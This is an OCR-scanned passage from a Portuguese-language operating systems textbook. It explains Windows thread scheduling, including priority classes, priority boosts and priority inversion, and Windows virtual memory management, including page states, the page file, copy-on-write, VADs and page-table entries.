empção no thread em execução, pois não há a garantia 
de um tempo mínimo de execução. O escalonador não 
é executado no próprio tratador da interrupção (pois 
isso poderia manter as interrupções desligadas por mui- 
to tempo). Em vez disso, um DPC é colocado na fila 


um pouco mais tarde, depois que o tratamento da in- 
terrupção termina. No segundo caso, um thread emitiu 
um down em um semáforo ou foi bloqueado por algum 
outro objeto, porém por um tempo limite que acaba de 
expirar. De novo é necessário que o tratador de interrup- 
ção coloque o DPC na fila, para evitar que ele execute 
durante o tratamento de interrupção do relógio. Se um 
thread ficou pronto por causa da expiração desse tempo 
limite, o escalonador será executado e, se o novo thread 
executável possuir uma prioridade mais alta, o thread 
atual sofrerá uma preempção como a do caso 1. 

Agora chegamos ao algoritmo real de escalonamen- 
to. A API Win32 fornece duas APIs para influenciar o 
escalonamento de threads. Primeiro, há uma chamada 
SetPriorityClass que define a classe de prioridade de 
todos os threads no processo de quem chamou. Os va- 
lores permitidos são: tempo real, alta, acima do normal, 
normal, abaixo do normal e ociosa. A classe de priori- 
dade determina as prioridades relativas de processos. 
A classe de prioridade do processo também pode ser 
utilizada por um processo que queira temporariamente 
marcar-se como segundo plano, o que significa que ele 
não interferirá em nenhuma outra atividade do siste- 
ma. Observe que a classe de prioridade é criada para o 
processo, mas acaba afetando a prioridade real de cada 
thread no processo por meio da configuração de uma 
prioridade-base atribuída a cada um deles quando de 
sua criação. 

Em segundo lugar, há uma chamada SetThread- 
Priority que define a prioridade relativa de algum thread 
(provável, mas não necessariamente, do thread que 
chamou) comparados à classe de prioridade de seu pro- 
cesso. Os valores permitidos são: tempo crítico, mais 
alto, acima do normal, normal, abaixo do normal, mais 
baixo e ocioso. Os threads marcados como de tempo 
crítico obtêm a mais alta prioridade de escalonamento 
em tempo não real, enquanto threads ociosos recebem 
a prioridade mais baixa, independentemente da classe 
de prioridade. Os outros valores de prioridade ajustam 
a prioridade-base de um thread com relação aos valores 
normais definidos pela classe de prioridade (+2, +1, 0, 
—1,-2, respectivamente). O uso de classes de prioridade 
e prioridades relativas para os threads fazem com que as 
aplicações decidam com maior facilidade quais priori- 
dades especificar. 

O escalonador funciona da seguinte maneira: o 
sistema tem 32 prioridades, numeradas de 0 a 31. As 
combinações de classes de prioridades e prioridades re- 
lativas são mapeadas sobre as 32 prioridades absolutas 
dos threads de acordo com a Figura 11.25. O número 
na tabela determina a prioridade-base do thread. Além 


disso, todo thread tem uma prioridade atual, que pode 
ser mais alta (mas não mais baixa) que a prioridade- 
-base e que discutiremos resumidamente. 

Para usar essas prioridades no escalonamento, o 
sistema mantém um arranjo com 32 listas de threads, 
correspondentes às prioridades O a 31, derivadas da Fi- 
gura 11.25. Cada lista contém um conjunto de threads 
prontos definidos como da prioridade correspondente. 
O algoritmo básico de escalonamento consiste em pes- 
quisar o vetor, desde a prioridade 31 até a prioridade 
0. Assim que uma prioridade que não estiver vazia for 
encontrada, o thread no início da fila será selecionado 
e executado por um quantum. Se o quantum expirar, o 
thread irá para o final da fila em seu nível de priorida- 
de e o thread da frente será escolhido como o próximo, 
mas outras palavras, quando há vários threads prontos 
no nível de prioridade mais alta, eles são executados em 
rodízio, com um quantum cada. Se nenhum thread esti- 
ver pronto, o processador fica ocioso, ou seja, é definido 
para um nível mais baixo de energia e espera que uma 
interrupção ocorra. 

É preciso observar que o escalonamento é feito esco- 
lhendo-se um thread, sem a preocupação com o processo 
ao qual ele pertence. Assim, o escalonador não escolhe 
um processo e depois um thread para aquele processo. 
Ele somente verifica os threads. Ele não considera qual 
thread pertence a qual processo, exceto para determinar 
se também precisa alternar espaços de endereçamento 
quando trocar de threads. 

Para aumentar a escalabilidade dos algoritmos de es- 
calonamento em multiprocessadores com uma grande 
quantidade de processadores, o escalonador tenta vigoro- 
samente não se apoderar da trava que protege o acesso ao 
arranjo global de listas de prioridade. Em vez disso, ele 
verifica se pode despachar diretamente para o processa- 
dor adequado um thread que esteja pronto para execução. 
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Para cada thread, o escalonador mantém uma ideia 
de processador ideal e, sempre que possivel, tenta es- 
calonar o thread para esse processador. Isso aumenta o 
desempenho do sistema, pois é mais provavel que os 
dados utilizados por um thread estejam armazenados 
na cache do processador ideal. O escalonador sabe dos 
multiprocessadores nos quais cada CPU tem sua pró- 
pria memoria e pode executar programas armazenados 
em qualquer memoria — mas com um custo quando a 
memória não é local. Esses sistemas são denominados 
máquinas NUMA (Non-Uniform Memory Access — 
Acesso não uniforme à memória). O escalonador ten- 
ta otimizar a colocação dos threads nessas máquinas. 
O gerenciador de memória tenta alocar páginas físicas 
no nó NUMA pertencente ao processador ideal para os 
threads quando sofrem falta de página. 

O arranjo de cabeçalhos de filas é mostrado na Fi- 
gura 11.26. A figura mostra que, de fato, há quatro cate- 
gorias de prioridades: tempo real, usuário, zero e ociosa 
— que na verdade vale —1. Isso merece um comentário. 
As prioridades 16 a 31 são chamadas do sistema e têm 
a intenção de criar sistemas que satisfaçam restrições de 
tempo real, como os prazos necessários para as apresen- 
tações de multimídia. Threads com prioridade de tempo 
real são executados antes de todos os outros, exceto de 
DPCs e ISRs. Se uma aplicação em tempo real dese- 
ja ser executada no sistema, ela pode requerer drivers 
de dispositivos que tomem o cuidado de não executar 
DPCs e ISRs por nenhum tempo estendido, já que eles 
podem fazer com que os threads de tempo real percam 
seus prazos. 

Usuários comuns não podem executar threads de 
tempo real. Se um thread de usuário foi executado com 
uma prioridade mais alta do que, digamos, um thread de 
teclado ou mouse e entrou em loop, o thread do teclado 
ou do mouse nunca será executado e o sistema ficará 


(FIGURA 11.25] Mapeamento das prioridades Win32 em prioridades Windows. 





















































Classe de prioridades de processo Win32 
Tempo Alta Acima do normal Normal Abaixo do Ociosa 
real normal 
Tempo critico 31 15 15 15 15 15 
Prioridades Mais alta 26 15 12 10 8 6 
de threads Acima do normal 25 14 11 9 7 5 
Win32 Normal 24 13 10 8 6 4 
Abaixo do normal 23 12 9 7 5 3 
Mais baixa 22 11 8 6 4 2 
Ociosa 16 1 1 1 1 1 
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[FIGURA 11.26] O Windows suporta 32 prioridades para threads. 
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pendurado. O direito de alterar a classe de prioridade 
para tempo real requer privilégio especial que deve ser 
permitido no token do processo. Os usuarios normais 
nao possuem tal privilégio. 

Os threads de aplicação normalmente são execu- 
tados com prioridades que variam de 1 a 15. Com a 
configuração das prioridades do processo e do thread, 
uma aplicação pode determinar quais threads recebem 
a preferência. Os threads ZeroPage são executados com 
prioridade 0 e convertem as paginas livres para páginas 
somente com zeros. Cada processador real possui seu 
próprio thread ZeroPage. 

Cada thread possui uma prioridade-base definida se- 
gundo a classe de prioridade do processo e a priorida- 
de relativa do thread. Entretanto, a prioridade utilizada 
para determinar em qual das 32 listas um thread pronto 
será incluído é determinada pela prioridade atual, que 
costuma ser igual à prioridade-base (mas não sempre). 
Em certas condições, a prioridade atual de um thread de 
tempo não real é determinada pelo núcleo como acima 
da prioridade-base (mas nunca acima de 15). Como o 
vetor da Figura 11.26 foi construído segundo a priorida- 
de atual, a mudança nessa prioridade afeta o escalona- 
mento. Os threads de tempo real nunca sofrem ajustes. 

Vejamos então quando uma prioridade de thread au- 
menta. Primeiro, quando uma operação de E/S termina 
e libera um thread que está esperando, a prioridade é au- 
mentada para dar a ele uma oportunidade de novamente 
executar logo e inicializar outra E/S. A ideia aqui é man- 
ter os dispositivos de E/S ocupados. De quanto deve ser 
o aumento de prioridade depende do dispositivo de E/S; 





Próximo thread a ser executado 


normalmente 1 para disco, 2 para a porta serial, 6 para o 
teclado e 8 para a placa de som. 

Segundo, quando é liberado um thread que esteja es- 
perando em um semáforo, mutex ou outro evento, sua 
prioridade é aumentada de dois níveis se for um proces- 
so em primeiro plano (o processo que controla a janela 
para a qual a entrada do teclado é enviada) e, caso con- 
trário, o aumento é de um nível. Esse ajuste gera a ten- 
dência de elevar a prioridade de processos interativos 
acima da prioridade de outros processos comuns que es- 
tejam em nível 8. Por fim, se um thread de GUI desperta 
— pois agora uma entrada na janela está disponível —, 
a prioridade aumenta pela mesma razão. 

Esses aumentos não são para sempre. Eles têm efeito 
imediato e podem acarretar o reescalonamento de toda a 
CPU. Entretanto, se um thread usar totalmente seu pró- 
prio quantum, ele perde um ponto e é rebaixado na fila 
do vetor de prioridades. Se usa outro quantum comple- 
to, ele rebaixa para outro nível, e assim continua, até 
que alcance o nível-base, no qual permanece até ser au- 
mentado novamente. 

Há outro caso no qual o sistema mexe com as prio- 
ridades. Imagine que dois threads estejam trabalhando 
juntos em um problema do tipo produtor-consumidor. O 
trabalho do produtor é mais difícil, portanto ele obtém 
uma prioridade alta — por exemplo, 12 — compara- 
da à prioridade do consumidor — 4. Em determinado 
ponto, o produtor preenche um buffer compartilhado e é 
bloqueado em um semáforo, conforme ilustra a Figura 
11.27(a). 


alee): E RIA Um exemplo de inversão de prioridade. 


Faz um down no semáforo 
e bloqueia 


Semáforo 


(a) 


Antes que o consumidor tenha a oportunidade de 
executar novamente, um outro thread qualquer, com 
prioridade 8, fica pronto e começa a executar, conforme 
mostra a Figura 11.27(b). Esse thread pode ficar execu- 
tando enquanto for capaz, pois possui maior prioridade 
que o consumidor, e o produtor, mesmo que tenha prio- 
ridade mais alta, está bloqueado. Nessas circunstâncias, 
o produtor nunca conseguirá executar novamente, até 
que o thread com prioridade 8 desista. Esse problema é 
mais conhecido pelo nome inversão de prioridade. O 
Windows resolve esse problema de inversão de priori- 
dade entre os threads do núcleo, embora por meio de um 
recurso no escalonador de threads chamado Autoboost. 
Ele rastreia automaticamente as dependências de recur- 
sos entre os threads e aumenta a prioridade de escalo- 
namento dos threads que mantêm recursos necessários 
para threads de prioridade mais alta. 

O Windows roda em PCs, que em geral têm apenas 
uma única sessão interativa ativada de cada vez. Porém, 
o Windows também admite um modo servidor de ter- 
minal, que aceita várias sessões interativas pela rede 
usando RDP (Remote Desktop Protocol — Protoco- 
lo de desktop remoto). Ao executar diversas sessões do 
usuário, é fácil para um usuário interferir com outro, 
consumindo muitos recursos do processador. O Win- 
dows implementa um algoritmo de fatia justa, o DFSS 
(Dynamic Fair-Share Scheduling — Escalonamento 
dinâmico de fatia justa), que evita que as sessões sejam 
executadas excessivamente. O DFSS utiliza grupos de 
escalonamento para organizar os threads em cada ses- 
são. Dentro de cada grupo, os threads são escalonados 
de acordo com as políticas de escalonamento normais 
do Windows, mas cada grupo recebe mais ou menos 
acesso aos processadores, com base no quanto esteve 
executando em conjunto. As prioridades relativas dos 
grupos são ajustadas lentamente, para permitir que se 
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Pronto consegue ser escalonado 


(b) 


ignorem surtos de atividade, reduzindo a fatia que um 
grupo tem permissão para usar apenas se ele utilizar um 
tempo excessivo do processador por longos períodos. 


11.5 Gerenciamento de memória 


O Windows tem um sistema de memória virtual 
extremamente sofisticado e complexo. Ele dispõe de 
diversas funções Win32 para usar a memória virtual, 
implementadas pelo gerenciador de memória — o maior 
componente da camada executiva NTOS. Nas próximas 
seções estudaremos os conceitos fundamentais, as cha- 
madas da API Win32 e, por fim, a implementação. 


11.5.1 Conceitos fundamentais 


No Windows, todo processo de usuário tem seu pró- 
prio espaço de endereçamento virtual. Nas máquinas 
x86, os endereços virtuais possuem 32 bits de largura; 
portanto, cada processo tem 4 GB de espaço de ende- 
reçamento virtual, com o usuário e o núcleo recebendo 
2 GB cada. Nas máquinas x64, tanto o usuário quanto 
o núcleo recebem mais endereços virtuais do que eles 
poderiam razoavelmente utilizar no futuro previsível. 
Tanto nas máquinas x86 quanto nas x64, o espaço de 
endereçamento virtual é paginado sob demanda, com 
tamanho de página fixo de 4 KB — embora em al- 
guns casos, conforme veremos em breve, também se- 
jam usadas páginas de 2 MB (utilizando somente um 
diretório de páginas e contornando a tabela de páginas 
correspondente). 

O esquema do espaço de endereçamento virtual para 
três processos x86 é mostrado na Figura 11.28 de forma 
bem simplificada. Os 64KB do topo e da base do espaço 
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lei): WhB4:) Esquema de espaços de endereçamento virtual para três processos de usuário no x86. As areas brancas são particulares 
de cada processo. As áreas sombreadas são compartilhadas entre todos os processos. 
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de endereçamento virtual de cada processo normalmen- 
te não estão mapeados. Essa escolha foi intencional, vi- 
sando a auxiliar a identificação de erros de programação 
e reduzir a facilidade de exploração de certos tipos de 
vulnerabilidades. 

Partindo dos 64 KB vêm o código e os dados pri- 
vados do usuário. Isso se estende por quase 2 GB. Os 
2 GB superiores contêm o sistema operacional, inclu- 
sive código, dados e pools paginados e não paginados. 
Os 2 GB superiores formam a memória virtual do nú- 
cleo, que é compartilhada entre todos os processos dos 
usuários, exceto pelos dados da memória virtual, como 
tabelas de páginas e listas do conjunto de trabalho, que 
são exclusivas de cada processo. A memória virtual do 
núcleo somente está acessível quando em execução no 
modo núcleo. O motivo para o compartilhamento da 
memória virtual do processo com o núcleo é que, ao fa- 
zer uma chamada de sistema, o thread desvia o controle 
para o modo núcleo e continua executando sem alterar 
o mapa da memória. Tudo o que precisa ser feito é al- 
ternar para a pilha do núcleo do thread. De um ponto de 
vista do desempenho, este é um grande avanço, e algo 
que o UNIX também faz. Como as páginas do proces- 
so do modo usuário ainda estão acessíveis, o código do 
modo núcleo consegue ler parâmetros e acessar buffers 
sem ter de ir e vir entre os espaços de endereçamento 
ou ter de temporariamente duplicar o mapa de páginas 
nos dois espaços. O dilema aqui é entre menos espaço 
privado de endereçamento por processo e chamadas de 
sistema mais rápidas. 


O Windows permite que os threads se conectem a 
outros espaços de endereçamento quando executados 
no modo núcleo. A conexão a espaços de endereça- 
mento permite ao thread acessar todo o espaço de en- 
dereçamento do modo usuário, assim como as partes 
do espaço de endereçamento do núcleo específicas ao 
processo, como o automapa para as tabelas de páginas. 
Os threads devem voltar ao espaço de endereçamento 
original antes de voltar ao modo usuário. 


Alocação de endereço virtual 


Cada página de endereçamento virtual pode estar em 
um de três estados: inválida, reservada ou comprometi- 
da. Uma página inválida não está atualmente mapeada 
para um objeto de seção de memória, e uma referência a 
ela causa uma falta de página que acarreta uma violação 
de acesso. Uma vez que o código ou os dados estejam 
mapeados em uma página virtual, diz-se que ela está 
comprometida. Uma falta de página em uma página 
comprometida resulta no mapeamento da página que 
contém a página virtual que causou a falta em uma das 
representadas pelo objeto da seção ou armazenadas no 
arquivo de páginas. Essa ocorrência normalmente re- 
quer a alocação de uma página física e a realização de 
uma operação de E/S sobre o arquivo representado pelo 
objeto da seção para que os dados do disco sejam lidos. 
Mas as faltas de página também podem ocorrer simples- 
mente porque a entrada da tabela de páginas precisa ser 


atualizada, visto que a página física referenciada conti- 
nua na memória e, portanto, nenhuma operação de E/S 
é necessária. Essas faltas são denominadas faltas apa- 
rentes (soft faults) e daremos mais detalhes sobre elas 
em breve. 

Uma página virtual também pode estar no estado 
reservada. Uma página virtual reservada é inválida, 
mas com a particularidade de que os endereços virtu- 
ais nunca serão alocados pelo gerenciador de memória 
para nenhum outro propósito. Por exemplo, quando se 
cria um novo thread, são reservadas muitas páginas de 
espaço de pilha no espaço de endereçamento virtual do 
processo, mas somente uma fica comprometida. A me- 
dida que a pilha aumenta, o gerenciador de memória 
automaticamente compromete páginas adicionais até 
que a reserva seja quase exaurida. As páginas reserva- 
das funcionam como paginas guardiãs, evitando que a 
pilha cresça demais e sobrescreva os dados de outros 
processos. A reserva de todas as páginas virtuais sig- 
nifica que a pilha pode em consequência aumentar até 
seu tamanho máximo sem correr o risco de que algumas 
páginas contíguas do espaço de endereçamento virtual 
necessário à pilha sejam liberadas para outro fim. Além 
dos atributos de inválida, reservada e comprometida, as 
páginas também podem ter atributos que indiquem se 
são de leitura, de escrita ou executáveis. 


Arquivo de páginas 


Há um compromisso interessante na atribuição da 
área de troca para as páginas comprometidas que não 
estejam sendo mapeadas para arquivos específicos. Es- 
sas páginas usam o arquivo de páginas. A pergunta é 
como e quando mapear a página virtual para uma loca- 
lização específica no arquivo. Uma estratégia simples 
seria, no momento em que a página for comprometida, 
associar cada página virtual a uma página em um dos ar- 
quivos. Isso garantiria haver sempre um local conheci- 
do para escrever cada página comprometida, caso fosse 
necessário retirá-la da memória. 

O Windows usa uma estratégia just-in-time (no 
momento certo). As páginas comprometidas apoiadas 
pelo arquivo de páginas não recebem espaço nesse ar- 
quivo até que precisem voltar para o disco. Nenhum 
espaço em disco é alocado para as páginas que nunca 
precisam sair da memória. Se a memória virtual total 
é menor do que a memória física disponível, não há 
necessidade de um arquivo de páginas, o que é conve- 
niente para os sistemas embutidos baseados no Win- 
dows. Também é assim que o sistema é inicializado, 
ja que os arquivos de páginas não são inicializados até 
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que o primeiro processo no modo usuário, smss.exe, 
comece sua execução. 

Com a estratégia de pré-alocação, toda a memória 
virtual do sistema utilizada para o armazenamento de 
dados privados (pilhas, heaps e páginas de código de 
cópia-na-escrita) fica limitada ao tamanho do arquivo 
de páginas. Com a alocação just-in-time, a memória 
virtual total pode ser tão grande quanto o tamanho dos 
arquivos de páginas e o da memória física combinados. 
Comparando os discos, cada vez maiores e mais bara- 
tos, com a memória física, as economias de espaço não 
são tão significativas quanto a possibilidade de melho- 
ria de desempenho. 

Com a paginação por demanda, as solicitações de 
leitura de páginas no disco devem ser prontamente aten- 
didas, pois o thread que encontrou a página ausente só 
pode continuar quando essa operação de entrada de pá- 
gina estiver concluída. As possíveis otimizações para 
faltas de páginas na memória envolvem a tentativa de 
pré-paginar páginas adicionais na mesma operação de 
E/S. Entretanto, as operações que escrevem as páginas 
modificadas no disco não costumam manter sincronis- 
mo com a execução dos threads. A estratégia just-in- 
-time para alocação de espaço no arquivo de paginas 
aproveita-se disso para aumentar o desempenho da ope- 
ração de escrita de páginas modificadas no arquivo de 
páginas. As páginas modificadas são agrupadas e escri- 
tas em grandes blocos. Como a alocação de espaço no 
arquivo de páginas só acontece no momento da escrita, 
o número de buscas necessárias à escrita de um lote de 
páginas pode ser otimizado alocando-se páginas próxi- 
mas no arquivo de páginas, fazendo-as contíguas. 

Quando as páginas armazenadas no arquivo de pági- 
nas são lidas para a memória, elas mantêm sua alocação 
nesse arquivo até sofrerem a primeira modificação. Se 
uma página nunca é modificada, ela irá para uma lista 
especial de páginas físicas livres, cnamada de lista de 
espera, onde pode ser reutilizada sem precisar ser escri- 
ta de volta no disco. Caso seja modificada, o gerencia- 
dor de memória libera a página do arquivo de páginas 
e a única cópia da página estará na memória. O geren- 
ciador de memória implementa isso marcando a página 
como somente leitura depois de ser carregada. No pri- 
meiro momento em que um thread tentar escrever na 
página, o gerenciador de memória detectará essa situa- 
ção e a liberará do arquivo, garantirá direito de acesso à 
página e deixará que o thread tente novamente. 

O Windows suporta até 16 arquivos de páginas dis- 
tribuídos em geral ao longo de diferentes discos para 
alcançar uma maior largura de banda de E/S. Cada um 
deles tem um tamanho inicial e um tamanho máximo 
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para que ele possa crescer, caso seja necessário, mas 
o melhor é criar esses arquivos com o tamanho máxi- 
mo durante a instalação do sistema. Se for necessário 
aumentá-los quando o sistema estiver mais carregado, é 
provável que o novo espaço nos arquivos fique altamen- 
te fragmentado, o que diminui o desempenho. 

O sistema operacional controla a relação entre os 
mapas de páginas virtuais e o arquivo de páginas por 
meio da escrita dessa informação na entrada da tabela 
de páginas para o processo para páginas privadas ou nas 
entradas de protótipo da tabela de páginas associadas 
ao objeto da seção para páginas compartilhadas. Além 
das associadas ao arquivo de páginas, muitas páginas no 
processo são mapeadas para arquivos normais no siste- 
ma de arquivos. 

O código executável e os dados somente leitura em 
um arquivo de programa (por exemplo, um arquivo 
EXE ou DLL) podem ser mapeados para o espaço de 
endereçamento de qualquer processo que os esteja utili- 
zando. Como essas páginas não podem ser modificadas, 
elas nunca precisam voltar para o disco, mas as páginas 
físicas só podem ser imediatamente reutilizadas depois 
que todos os mapeamentos da tabela de páginas estejam 
marcados como inválidos. No futuro, quando a página 
for novamente necessária, o gerenciador de memória 
lerá a página a partir do arquivo de programa. 

Às vezes as páginas inicializadas como somente lei- 
tura acabam sendo modificadas. Por exemplo, a defi- 
nição de um ponto de interrupção no código durante a 
depuração de um programa, ou o ajuste de um código 
para que ele seja realocado para diferentes endereços 
dentro de um processo, ou ainda a modificação de pági- 
nas de dados que começaram compartilhadas. Em casos 
assim, o Windows, bem como a maioria dos sistemas 
operacionais modernos, suporta um tipo de página de- 
nominado copiar na escrita. Páginas desse tipo são ini- 
cializadas como páginas mapeadas comuns e, quando 
ocorre uma tentativa de modificação de qualquer par- 
te da página, o gerenciador de memória faz uma cópia 
particular passível de escrita. Em seguida, ele atualiza 
a tabela de páginas com a informação sobre a página 
virtual para que ela aponte para a cópia particular e faz 
com que o thread tente escrever novamente — sabendo 
que agora ele conseguirá. Se, no futuro, a cópia precisar 
voltar para o disco, ela será escrita no arquivo de pági- 
nas, e não no arquivo original. 

Além de mapear código de programa e dados de 
arquivos EXE e DLL, arquivos comuns também po- 
dem ser mapeados para a memória, o que permite que 
programas façam referência a dados de arquivos sem 
realizar operações explícitas de leitura e escrita. As 


operações de E/S continuam sendo necessárias, mas 
elas são implicitamente fornecidas pelo gerenciador de 
memória utilizando o objeto de seção para representar 
o mapeamento entre as páginas na memória e os blocos 
nos arquivos em disco. 

Os objetos de seção não precisam fazer referência 
a um arquivo e podem estar relacionados com regiões 
da memória. Com o mapeamento de objetos de seção 
anônimos em múltiplos processos, a memória pode ser 
compartilhada sem precisar alocar um arquivo em dis- 
co. Como as seções podem ser nomeadas no espaço de 
nomes do NT, os processos podem ser reunidos abrin- 
do seções pelo nome, bem como duplicando descritores 
entre os processos. 


11.5.2 Chamadas de sistema para gerenciamento 
de memória 


A API Win32 contém diversas funções que permi- 
tem a um processo gerenciar explicitamente sua memó- 
ria virtual. As mais importantes estão relacionadas na 
Figura 11.29. Todas elas operam em uma região forma- 
da por uma única página ou por uma sequência de duas 
ou mais páginas que são consecutivas no espaço de en- 
dereçamento virtual. Claro, os processos não precisam 
gerenciar sua memória; a paginação ocorre automatica- 
mente, mas estas chamadas oferecem poder e flexibili- 
dade adicionais aos processos. 

As primeiras quatro funções da API servem para 
alocar, liberar, proteger e consultar regiões do espaço 
de endereçamento virtual. As regiões alocadas sempre 
começam em endereços múltiplos de 64 KB para mini- 
mizar os problemas de portabilidade nas futuras arquite- 
turas, com páginas maiores que as atuais. A quantidade 
realmente alocada para o espaço de endereçamento pode 
ser menor que 64 KB, mas deve ser um múltiplo do ta- 
manho da página. As duas funções seguintes na API dão 
a um processo a capacidade de manter páginas sempre 
na memória, de modo que estas não voltem ao disco, e 
também de desfazer essa operação. Por exemplo, um 
programa de tempo real pode precisar dessa habilidade 
para evitar faltas de página durante operações críticas. 
Um limite é assegurado pelo sistema operacional para 
impedir que os processos fiquem muito “vorazes”. Na 
verdade, as páginas podem ser removidas da memória, 
mas apenas se o processo inteiro for passado para o dis- 
co. Quando ele tiver sido trazido de volta, todas as pá- 
ginas bloqueadas serão carregadas antes que qualquer 
thread possa começar a executar novamente. Embora a 
Figura 11.29 não ilustre esse fato, o Windows também 
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ler) As principais funções da API Win32 para gerenciamento de memória virtual no Windows. 





Função da API Win32 


Descrição 





VirtualAlloc 


Reserva ou compromete uma região 





VirtualFree 


Libera ou descompromete uma região 





VirtualProtect 


Altera a proteção de leitura/escrita/execução de uma região 





VirtualQuery 


Pergunta sobre o estado de uma região 





VirtualLock 


Torna uma região residente em memória (isto é, desabilita a paginação para essa região) 





VirtualUnlock 


Torna a região paginavel, da maneira usual 





CreateFileMapping 


Cria um objeto de mapeamento de arquivo e (opcionalmente) atribui um nome a ele 





MapViewOfFile 


Mapeia (parte de) um arquivo no espaço de endereçamento 





UnmapViewOfFile 


Remove um arquivo mapeado do espaço de endereçamento 





OpenFileMapping 








Abre um objeto de mapeamento de arquivo criado anteriormente 





possui funções API nativas para permitir que um pro- 
cesso tenha acesso à memória virtual de outro processo 
ao qual tenha recebido controle (isto é, para o qual ele 
tenha um descritor, conforme mostra a Figura 11.7). 

As últimas quatro funções da API listadas são para 
gerenciamento de arquivos mapeados em memória. Para 
mapear um arquivo, é preciso primeiro criar um objeto 
de mapeamento de arquivo (veja a Figura 11.8), com 
CreateFileMapping. Essa função retorna um descritor 
para o objeto de mapeamento de arquivos (ou seja, um 
objeto de seção) e opcionalmente passa um nome para 
ele dentro do espaço de nomes Win32 e, portanto, outro 
processo pode usá-lo. As duas funções seguintes ma- 
peiam e desfazem o mapeamento de visões dos objetos 
de seção a partir do espaço de endereçamento virtual de 
um processo. A última função da API pode ser usada por 
um processo para compartilhar um mapeamento criado 
por outro processo com CreateFileMapping e normal- 
mente criado para mapear memória anônima. Dessa 
maneira, dois ou mais processos podem compartilhar 
regiões de seus espaços de endereçamento. Essa técnica 
permite-lhes escrever em regiões confinadas da memó- 
ria virtual um do outro. 


11.5.3 Implementação do gerenciamento 
de memória 


Na plataforma x86, o Windows suporta, por processo, 
um único espaço de endereçamento linear de 4 GB com 
páginas por demanda. A segmentação não é suportada de 
maneira alguma. Teoricamente, os tamanhos das páginas 
podem ser qualquer potência de 2 até 64 KB. No x86 
esse limite em geral está fixado em 4 KB. Além disso, o 


próprio sistema operacional pode usar páginas de 2 MB 
para aumentar a eficiência da TLB (Translation Look- 
aside Buffer — tabela de tradução rápida) na unidade de 
gerenciamento de memória do processador. O uso de pá- 
ginas de 2 MB pelo núcleo e grandes aplicações aumenta 
significativamente o desempenho por meio da melhora 
na taxa de acerto para a TLB e da redução do número 
de vezes que a tabela de páginas precisa ser varrida para 
encontrar as entradas que não estão na TLB. 

De modo diferente do escalonador, que seleciona 
individualmente os threads para executar e não se pre- 
ocupa com os processos, o gerenciador de memória se 
preocupa exclusivamente com os processos, não com 
os threads. Afinal de contas, são os processos, não os 
threads, que possuem o espaço de endereçamento e é 
com isso que o gerenciador de memória se preocupa. 
Quando uma região do espaço de endereçamento virtual 
é alocada — como quatro delas foram para o processo 
A na Figura 11.30 —, o gerenciador de memória cria 
um VAD (Virtual Address Descriptor — descritor de 
endereço virtual) para ele, contendo o intervalo de en- 
dereços mapeados, a seção que representa o arquivo de 
armazenamento de suporte e o deslocamento onde ele 
é mapeado e as permissões. Quando a primeira página 
é tocada, cria-se o diretório de tabelas de páginas e seu 
endereço físico é inserido no objeto o processo. Um es- 
paço de endereçamento é totalmente definido pela lista 
de seus VADs. Os VADs estão organizados em árvores 
balanceadas, para que o descritor para um endereço es- 
pecífico possa ser localizado de forma eficiente. Esse 
esquema suporta espaços de endereçamento esparsos, 
pois áreas não utilizadas entre as regiões mapeadas não 
empregam recursos (memória ou disco) que, portanto, 
estão livres. 
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[FIGURA 11.30) Regiões mapeadas com suas páginas duplicadas no disco. O arquivo lib.dll é mapeado em dois espaços de 


endereçamento ao mesmo tempo. 


Armazenamento de suporte no disco 





Processo A 


Regiões { 





Prog1.exe 


Tratamento de falta de pagina 


No Windows, quando um processo é inicializado, 
muitas das paginas mapeando os arquivos imagem dos 
programas EXE e DLL podem ja estar na memoria, 
pois eles sao compartilhados com outros processos. As 
paginas graváveis das imagens são marcadas como co- 
piar na escrita para que possam ser compartilhadas até 
o momento em que precisarem ser modificadas. Se o 
sistema operacional reconhece o EXE por uma execu- 
ção anterior, ele pode ter gravado o padrão de referência 
às páginas utilizando uma tecnologia que a Microsoft 
denomina SuperFetch. Esta tenta pré-paginar a maior 
parte das páginas necessárias, mesmo que o processo 
ainda não tenha sentido falta delas. Esse procedimento 
reduz a latência de inicializar aplicações, pois dispensa a 
leitura de páginas do disco em razão da execução do có- 
digo de inicialização nas imagens. Isto aumenta a vazão 
para o disco, pois é mais fácil para os drivers organizar 
as leituras para reduzir o tempo de busca necessário. A 
pré-paginação de processos também é utilizada durante 
a inicialização do sistema, quando uma aplicação em 
segundo plano passa para o primeiro plano, e durante a 
reinicialização do sistema após hibernação. 

A pré-paginação é suportada pelo gerenciador de me- 
mória, mas implementada como um componente separa- 
do do sistema. As páginas levadas para a memória não são 
inseridas na tabela de páginas do processo, mas na lista de 
espera a partir da qual podem ser rapidamente inseridas 
no processo quando necessário, sem necessidade de aces- 
so ao disco. 


Libdll =~ 


Processo B 


Biblioteca 
~~~ Jcompartilhada 
| 
= 





Prog2.exe 


As páginas não mapeadas são um pouco diferentes, 
pois não são inicializadas da leitura do arquivo. Em vez 
disso, na primeira vez que uma página não mapeada é 
acessada, o gerenciador de memória cria uma nova pági- 
na física e certifica-se de que seu conteúdo seja somente 
zeros (por razões de segurança). Em faltas futuras, uma 
página não mapeada pode precisar ser encontrada na 
memória ou então lida de volta do arquivo de páginas. 

A paginação por demanda no gerenciador de me- 
mória é causada pelas faltas de página. A cada falta, 
tem-se um desvio para o núcleo, que então constrói 
um descritor independente de máquina indicando o 
que aconteceu e passa esse descritor para a parte do 
executivo que realiza o gerenciamento de memória. O 
gerenciador de memória verifica a validade do acesso. 
Se a página que faltou cair em uma região comprome- 
tida, ele busca o endereço na lista de VADs e encontra 
(ou cria) a entrada na tabela de páginas do processo. 
No caso de uma página compartilhada, o gerenciador 
de memória utiliza a entrada da tabela de páginas pro- 
tótipo associada ao objeto de seção para poder preen- 
cher a nova entrada da tabela de páginas para a tabela 
de páginas do processo. 

O formato das entradas da tabela de páginas varia 
de acordo com cada arquitetura de processador. Para as 
arquiteturas x86 e x64, as entradas para uma página ma- 
peada são mostradas na Figura 11.31. Se uma entrada 
for marcada como válida, seus conteúdos são interpre- 
tados pelo hardware e assim o endereço virtual pode ser 
traduzido na página física correta. As páginas não ma- 
peadas também têm entradas, mas são marcadas como 
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lc) W RES Uma entrada de tabela de páginas (PTE) para uma página mapeada nas arquiteturas Intel x86 e AMD x64. 


63 62 


52 51 12.1 





N Número da 


AVL AVL 


X página física 


8 7 65432140 
P P|P/U|R 

GlalD|lalC|w|/|/|P 
T DITI|IS|W 





NX Não eXecuta 

AVL Disponível para o SO 

G Página global 

PAT Tabela de atributos de página 
D Suja (modificada) 

A Acessada (referenciada) 


inválidas e o hardware ignora o restante da entrada. O 
formato do software é um pouco diferente do formato 
